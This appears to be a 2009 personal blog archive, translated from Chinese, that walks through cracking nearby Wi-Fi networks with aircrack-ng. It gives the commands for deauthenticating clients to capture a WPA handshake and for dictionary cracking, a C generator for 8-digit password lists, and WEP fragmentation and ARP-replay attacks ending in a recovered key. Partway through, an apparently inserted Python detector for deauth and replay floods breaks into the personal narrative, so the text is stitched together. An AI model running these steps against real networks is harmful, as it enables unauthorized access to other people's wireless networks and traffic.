Monthly archive: December 2009

WPA cracking

00:23:69:xx:xx:xx -85 6 54 WPA TKIP PSK HCP

00:0A:EB:xx:xx:xx local MAC
00:23:69:xx:xx:xx target AP MAC
00:14:A5:xx:xx:DD MAC of a legitimate client on the target AP

airodump-ng -c 6 --bssid 00:23:69:xx:xx:xx -w HCP mon0

aireplay-ng -0 10 -a 00:23:69:xx:xx:xx mon0
Or type: aireplay-ng -0 10 -a (ap mac) -c (legitimate client mac) mon0
aireplay-ng -0 10 -a 00:23:69:xx:xx:xx -c 00:14:A5:xx:xx:DD mon0
Capturing one handshake is enough.

Dictionary cracking
aircrack-ng -w password.txt HCP*.cap
Another source says to use: aircrack-ng -w password.txt -b (ap mac) 12345*.cap

Generating the dictionary on Linux: p.c

#include <stdio.h>
#include <stdlib.h>

/* Prints every 8-digit decimal string from 00000000 to 99999999, one per line.
   Each while loop covers one number width and pads it with leading zeros
   (a single loop with printf("%08d\n", i) would produce the same output). */
int main(void)
{
    int i = 1;
    //printf("%d\n", sizeof(long int));
    printf("00000000\n");
    while (i <= 9)        { printf("0000000%d\n", i); i++; }
    while (i <= 99)       { printf("000000%d\n", i);  i++; }
    while (i <= 999)      { printf("00000%d\n", i);   i++; }
    while (i <= 9999)     { printf("0000%d\n", i);    i++; }
    while (i <= 99999)    { printf("000%d\n", i);     i++; }
    while (i <= 999999)   { printf("00%d\n", i);      i++; }
    while (i <= 9999999)  { printf("0%d\n", i);       i++; }
    while (i <= 99999999) { printf("%d\n", i);        i++; }

    return 0;
}

gcc p.c -o p
./p > 8bit

This produces the 8-digit pure-numeric dictionary; the generated file is 853M.

If anything is unclear, see
http://www.kumouse.com/article.asp?id=144
http://www.kumouse.com/article.asp?id=156

Faster WEP cracking

airodump-ng -c 6 --bssid 00:18:39:xx:xx:xx -w c1 mon0
aireplay-ng -1 0 -e "TP-LINK" -a 00:18:39:xx:xx:xx -h 00:0A:EB:xx:xx:xx mon0

aireplay-ng -5 -b 00:18:39:xx:xx:xx -h 00:0A:EB:xx:xx:xx mon0

packetforge-ng -0 -a 00:18:39:xx:xx:xx -h 00:0A:EB:xx:xx:xx 5 -k 255.255.255.255 -l 255.255.255.255 -y fragment-1208-192737.xor -w arp

aireplay-ng -2 -r arp -x 1024 mon0

If anything is unclear, see the previous article
http://www.kumouse.com/article.asp?id=144

Checking how hard it is to crack a wireless network under Fedora

yum install aircrack-ng

Today I tested how easy a WEP key really is to crack.
Here is the full process.
1. Put the card into monitor mode
airmon-ng start wlan0 6
2. Scan for nearby networks
airodump-ng mon0
3. Collect enough packets
airodump-ng -c 6 --bssid 00:21:27:xx:xx:xx -w TP-LINK mon0
Note: 00:21:27:xx:xx:xx is the MAC of the target AP; -c 6 means channel 6
4. Use an attack to speed up packet collection
aireplay-ng -1 0 -a 00:21:27:xx:xx:xx -h 00:0A:EB:xx:xx:xx mon0
aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b 00:21:27:xx:xx:xx -h 00:0A:EB:xx:xx:xx mon0
Note: 00:21:27:xx:xx:xx is the target AP's MAC; 00:0A:EB:xx:xx:xx is the local wireless card's MAC
5. Once more than 5000 packets have been collected, start cracking and wait for the result
aircrack-ng TP-LINK*.cap
6. Look at the result
Aircrack-ng 1.0

[00:04:51] Tested 8253 keys (got 25010 IVs)

KB depth byte(vote)
0 0/ 1 19(39936) 74(32768) B7(32000) 8B(31744) 7D(31232) 25(30976)
1 13/ 20 C8(29440) 2C(29184) 39(29184) 3D(29184) 65(29184) 73(29184)
2 0/ 1 08(39424) A9(32512) 28(32256) F0(32256) 83(30976) 94(30720)
3 0/ 14 26(33792) D0(33280) CC(32768) C7(31232) 95(30464) 98(30464)
4 5/ 31 00(30976) B4(30720) 12(30720) 1F(30720) 29(30720) 5D(30720)

KEY FOUND! [ 19:81:09:27:11 ]
  Decrypted correctly: 100%
See the key? It is 1981092711; it took 25,000 packets in total and 4 minutes.
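Both procedures on this page leave a rate signature that an AP or a wireless IDS can see: the deauthentication burst from "aireplay-ng -0 10" in the WPA section, and the thousands of identical replayed data frames from "aireplay-ng -2" in the WEP sections. The script below is an added detection example written for this archive; it is not part of the original posts and not aircrack-ng code. The Frame record, the MAC addresses (constructed stand-ins for the masked xx:xx:xx ones above), the frame list and the thresholds are all assumptions chosen for the demonstration.

```python
"""Rate-based detectors for deauth bursts and replayed-frame floods over a
constructed list of captured 802.11 frame summaries (added example, not from the
original post; field names, addresses and thresholds are assumptions)."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Frame:
    ts: float      # capture time in seconds (assumed field)
    kind: str      # "beacon", "deauth", "disassoc" or "data"
    src: str       # transmitter MAC
    dst: str       # receiver MAC
    length: int    # frame length in bytes


BROADCAST = "ff:ff:ff:ff:ff:ff"
AP_WPA = "00:23:69:00:00:01"      # constructed; stands in for 00:23:69:xx:xx:xx
AP_WEP = "00:18:39:00:00:02"      # constructed; stands in for 00:18:39:xx:xx:xx
STA_INJECT = "00:0a:eb:00:00:03"  # constructed; stands in for the injecting card
STA_LEGIT = "00:14:a5:00:00:dd"   # constructed; a legitimate client

# Constructed capture: normal beacons, a burst of 10 broadcast deauths spoofed
# from the WPA AP within one second, one ordinary deauth from another AP, then
# 300 identical 68-byte data frames in 0.6 s from one station (replay pattern),
# mixed with 20 ordinary data frames of varying length from a real client.
SAMPLE = (
    [Frame(0.5 * k, "beacon", AP_WPA, BROADCAST, 120) for k in range(10)]
    + [Frame(1.0 + 0.1 * k, "deauth", AP_WPA, BROADCAST, 26) for k in range(10)]
    + [Frame(3.0, "deauth", AP_WEP, STA_LEGIT, 26)]
    + [Frame(4.0 + 0.002 * k, "data", STA_INJECT, BROADCAST, 68) for k in range(300)]
    + [Frame(4.0 + 0.05 * k, "data", STA_LEGIT, AP_WEP, 90 + k) for k in range(20)]
)


def _max_in_window(stamps, window):
    """Largest number of timestamps that fall inside any sliding window of
    `window` seconds (two-pointer sweep over the sorted timestamps)."""
    stamps = sorted(stamps)
    best, left = 0, 0
    for right, ts in enumerate(stamps):
        while ts - stamps[left] > window:
            left += 1
        best = max(best, right - left + 1)
    return best


def detect_deauth_bursts(frames, window=5.0, threshold=5):
    """Map of sender MAC -> peak count for senders that emitted at least
    `threshold` deauth/disassoc frames within `window` seconds. A healthy AP
    deauthenticates clients only occasionally; ten in a row is a burst."""
    per_src = defaultdict(list)
    for f in frames:
        if f.kind in ("deauth", "disassoc"):
            per_src[f.src].append(f.ts)
    alerts = {}
    for src, stamps in per_src.items():
        peak = _max_in_window(stamps, window)
        if peak >= threshold:
            alerts[src] = peak
    return alerts


def detect_replay_floods(frames, window=1.0, threshold=100):
    """Map of (sender MAC, frame length) -> peak count for data frames of one
    fixed length repeated at least `threshold` times within `window` seconds.
    Replaying a captured ARP request re-injects the same short frame hundreds
    of times per second, which real client traffic does not do."""
    per_key = defaultdict(list)
    for f in frames:
        if f.kind == "data":
            per_key[(f.src, f.length)].append(f.ts)
    alerts = {}
    for key, stamps in per_key.items():
        peak = _max_in_window(stamps, window)
        if peak >= threshold:
            alerts[key] = peak
    return alerts


if __name__ == "__main__":
    print("deauth bursts:", detect_deauth_bursts(SAMPLE))
    print("replay floods:", detect_replay_floods(SAMPLE))
```

On the constructed capture the first detector flags only the WPA AP's address (ten deauths in under a second; the single deauth from the other AP stays below the threshold), and the second flags only the (injecting station, 68 bytes) pair, while the client's twenty frames of differing lengths never repeat. Because the deauth frames carry the AP's own address, a real deployment would correlate these alerts with a sequence-number or signal-strength mismatch to tell a spoofed sender from the AP itself.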
============================================================
I'll try WPA cracking when I have time.

On connecting a single wireless card to multiple APs: VirtualWifi only works under Windows.
I'll look up how to use it online first; to be continued.....